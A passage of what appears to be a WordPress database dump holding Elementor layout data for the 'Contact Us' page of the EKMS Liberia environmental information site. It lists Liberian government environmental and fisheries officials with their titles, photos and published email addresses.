href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23390,3399,'_elementor_edit_mode','builder'),(23391,3399,'_elementor_template_type','wp-page'),(23392,3399,'_elementor_version','3.0.16'),(23393,3399,'_wp_page_template','default'),(23394,3399,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\